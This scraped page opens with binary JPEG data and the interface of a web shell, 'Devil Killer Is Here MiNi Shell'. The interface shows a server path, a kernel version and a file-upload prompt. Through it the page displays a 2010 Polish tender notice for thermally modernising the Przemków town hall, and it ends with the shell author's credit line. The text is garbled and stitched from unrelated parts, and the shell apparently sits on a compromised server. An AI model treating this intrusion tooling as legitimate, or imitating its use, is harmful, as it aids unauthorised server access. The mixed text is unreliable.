JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100719/215544-N-2010.html

<p class="kh_header"><b>Przemków: Termomodernizacja budynku Urzędu Miejskiego w Przemkowie</b><br>
<b>Numer ogłoszenia: 215544 - 2010; data zamieszczenia: 19.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Przemkowie , plac Wolności 25, 59-170 Przemków, woj. dolnośląskie, tel. 076 831 92 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Urzędu Miejskiego w Przemkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Cel i zakres robót do wykonania

Przedmiotem inwestycji jest wykonanie prac termomodernizacyjnych polegających na:
-dociepleniu stropodachu budynku,
-docieplenie ścian zewnętrznych wraz z wykonaniem nowych tynków elewacyjnych,
-wymiana starych nieszczelnych okien drewnianych na nowe z PCW,
-wymiana części instalacji c. o.

2) Charakterystyka przedmiotu inwestycji
           
Budynek wybudowany szacunkowo w roku 1980.
Budynek 3-kondygnacyjny, w niewielkiej części podpiwniczony, wybudowany
w technologii tradycyjnej. Układ konstrukcyjny budynku podłużny. Dach płaski betonowy, jednospadowy.

3) Parametry techniczne budynku

Powierzchnia zabudowy                          391,0 m2
Powierzchnia użytkowa bez piwnic         936,0 m2 
Powierzchnia użytkowa piwnic                  80,0 m2
Kubatura budynku                                  3519,0 m3

4.  Opis robót termomodernizacyjnych
         
Stropodach docieplić luźną wełną mineralną grubość usypania 18 cm w technologi wdmuchiwania i po wymianie obróbek blacharskich (ogniomur, pas nadrynnowy i podrynnowy, rynny) pokryć 1*papą termozgrzewalną.
Ściany zewnętrzne docieplić styropianem ściana EPS 70 grub. 13 cm i wykończyć tynkiem cienkowarstwowym.
Stolarka okienna PCV-do pomieszczeń Policji o klasie odporności antywłamaniowej Wk3, do pozostałych pomieszczeń na poziomie parteru o klasie odporności antywłamaniowej Wk2.
Stolarka drzwiowa PCV - do pomieszczeń Policji o odporności antywłamaniowej Wk3.
Stolarka drzwiowa wewnętrzna - drzwi Multi-Door id2 kolor dąb archiwum II piętro.
Wszystkie elementy stalowe zewnętrzne malować farbą Hamerite z efektem młotkowym (kolorystyka wg. uzgodnień z inwestorem).
Zadaszenie nad wejściem do piwnic pokryć blachą trapezową ocynkowaną malowaną proszkowo (kolorystyka wg. uzgodnień z inwestorem).
Po rozebraniu betonowych daszków nad wejściami wykonać nowe z poliwęglanu pełnego na konstrukcji aluminiowej. 
Zadaszenie nad wejściem głównym do budynku UM wsparte dodatkowo na konstrukcji żelbetowej o przekroju 16x16 cm i wymiarach szer.180cm, wys.220cm., o kształcie pokazanym w załączniku, pokrytych tynkiem Mozaikowym MARMURIT  
W związku z wykonaniem cz궜ci instalacji c.o przed przygotowaniem oferty należy wykonać własne przedmiary.
PARTER
- pom.1;2;3;4;5;15;16;17;18;19;20;21; do wymiany wszystkie grzejniki i cała instalacja c.o zgodnie z PT.
I PIĘTRO
- pom. 108;107; zamontowane nowe grzejniki, do wymiany cała instalacja c.o zgodnie z PT.
- pom. 109;106; 105; 104; 103; 101; 114; 113; do wymiany wszystkie grzejniki i cała instalacja c.o zgodnie z PT.
II PIĘTRO
- pom. 201;213;214;202;203; zamontowane po jednym nowym grzejniku, do wymiany cała instalacja c.o zgodnie z PT.
- pom. 208; zamontowane dwa nowe grzejniki, do wymiany cała instalacja c.o zgodnie z PT.
- pom. 204; 205; 209; 207; do wymiany wszystkie grzejniki i cała instalacja c.o zgodnie z PT.
Należy uwzględnić wymianę parapetów okiennych na granitowe gr. 3cm (odcień bršzy np. Mapple Red) we wszystkich pomieszczeniach oprócz klatki schodowej i korytarzy.
Blacha trapezowa nad wejśœciem do piwnicy gr. 0,9-1,0mm, wys. Profilu 20mm, szer. Profilu 32mm
Elewacja południowa i wschodnia – pod parapetami okiennymi I i IIp. wykonać bonie szr. 10-12cm, wysunięte 2cm, zabezpieczone obróbkami blacharskimi jako całośœć z parapetami zewnętrznymi wykonanymi z blachy powlekanej gr.0,55mm szarej (kolor do uzgodnienia z inwestorem).
5.Kolorystyka œścian ustalona na podstawie palety kolorów:
-cokół wykonać na wys. 50cm, CABE marmurit 245 grub. 1,5mm
-kolor ciemny elewacji STO-ISPO 21608
-kolor jasny elewacji STO-ISPO 20323
6.Obróbkę blacharską ogniomurów wykonać z blachy powlekanej gr. 0,55mm szarej łączonej na rab stojący, ze względu na docieplenie śœcian wzmocnionej od spodu płaskownikiem przymocowanym wkrętami do ogniomuru co 50cm.
7.Zadaszenia nad wejœściami do budynku szt 2:
-szer. 2,80 m x 1,0 m z poliwęglanu litego na konstrukcji aluminiowej,
-przy wejœściu głównym do budynku wykonać element żelbetowy o przekroju poprzecznym 16x16cm, szer. 180cm i wys. 220cm, obrobić tynkiem Marmurit gr. 1,5mm.

UWAGI:
Szczegółowy opis przedmiotu zamówienia zawarty jest w Projekcie technicznym oraz w Specyfikacji technicznej wykonania i odbioru robót budowlanych. Przedmiar robót jest dokumentem pomocniczym. Zaleca się przeprowadzenie wizji w terenie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.21.00.00-2, 45.31.00.00-3, 45.32.00.00-6, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w kwocie 7.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jest uprawniony do występowania w obrocie prawnym zgodnie z wymogami ustawowymi,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełnia warunek jeżeli posiada wiedzę i doświadczenie w podobnym zakresie. Zamawiający wymaga, aby posiadał doświadczenie w realizacji podobnego przedmiotu zamówienia, tj.: wykonał min. Jedną robotę  obiekcie o podobnej kubaturze i zbliżonej wartości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>skierują do realizacji niniejszego zadania osobę na stanowisko kierownika robót, który posiada aktualną przynależność do właściwej Izby Budowlanej oraz posiada uprawnienia budowlane upoważniające do prowadzenia robót ujętych w zakresie przetargu, tj. Branży konstrukcyjno-budowlanej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby wykonawca posiadał ważną polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający przewiduje możliwość zmiany terminu wykonania umowy w przypadku:
a) wprowadzenia zmian w dokumentacji techniczno-projektowej, co może powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy,
b) zlecenia robót dodatkowych lub zamiennych, wynikających z konieczności poprawienia lub uzupełnienia dokumentacji projektowej, jeżeli terminy ich zlecenia, rodzaj lub zakres mają wpływ na pierwotny termin umowy,
c) wystąpienia niekorzystnych warunków atmosferycznych i klęsk żywiołowych,
w tym m.in.: długotrwałe opady atmosferyczne (śnieg, deszcz), niskie temperatury, powodzie, wichury, huragan, tornado,
d) wstrzymania robót przez Zamawiającego albo przerw w wykonaniu robót powstałych z winy Zamawiającego a spowodowanych okolicznościami, których nie mógł przewidzieć w chwili zawarcia umowy, mających wpływ na prowadzenie
i realizację robót,
e) pisemnego uzgodnienia pomiędzy Stronami dotyczącego skrócenia terminu zakończenia realizacji umowy,
f) zmiany w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy lub późniejszej eksploatacji budynku,
g) uzgodnionych możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego,
h) zmiany terminu rozliczenia lub przesunięć wypłaty transz dofinansowania inwestycji ze środków zewnętrznych.

2) Zamawiający dopuszcza możliwość zmiany postanowień umowy
w przypadku:
a)dokładniejszego doprecyzowania zapisów umowy,
b)wprowadzenia zmian korzystnych dla Zamawiającego,
c)zmiany formy zabezpieczenia należytego wykonania umowy,
d)zmniejszenia zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia,
e)zmiany terminów oraz zasad płatności na skutek wystąpienia przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy, których nie można było przewidzieć w chwili jej zawarcia,
f)zmiany wysokości kwot w harmonogramie rzeczowo-czasowo-finansowym - załącznik do umowy,
g)zmiany harmonogramu rzeczowo-czasowo-finansowego z powodu zmniejszenia zakresu rzeczowo-czasowo-finansowego, zmiany terminów realizacji poszczególnych zakresów rzeczowych (etapów robót),
h)w związku z finansowaniem zadania inwestycyjnego ze środków zewnętrznych Zamawiający zastrzega sobie możliwość spowolnienia lub chwilowych przerw w realizacji robót. Wykonawca zostanie poinformowany o zaistniałej sytuacji, zostanie wówczas sporządzony stosowny aneks oraz zmiana harmonogramu rzeczowo-czasowo-finansowego, jeżeli będzie miało to zastosowanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.przemkow.npc.pl/zamowienia_publiczne/powyzej_14_000/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Przemkowie, ul. Plac Wolności 25, 59-170 Przemków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2010 godzina 10:00, miejsce: Urząd Miejski w Przemkowie, ul. Plac Wolności 25, 59-170 Przemków - punkt informacyjny, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zadane ujęto w projekcie pn. Termomodernizacja budynków użyteczności publicznej, na który złożono wniosek aplikacyjny w ramach Programu Operacyjnego Innowacyjna Gospodarka (Priorytet 9 Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna. Działanie 9.3 Termomodernizacja budynków użyteczności publicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com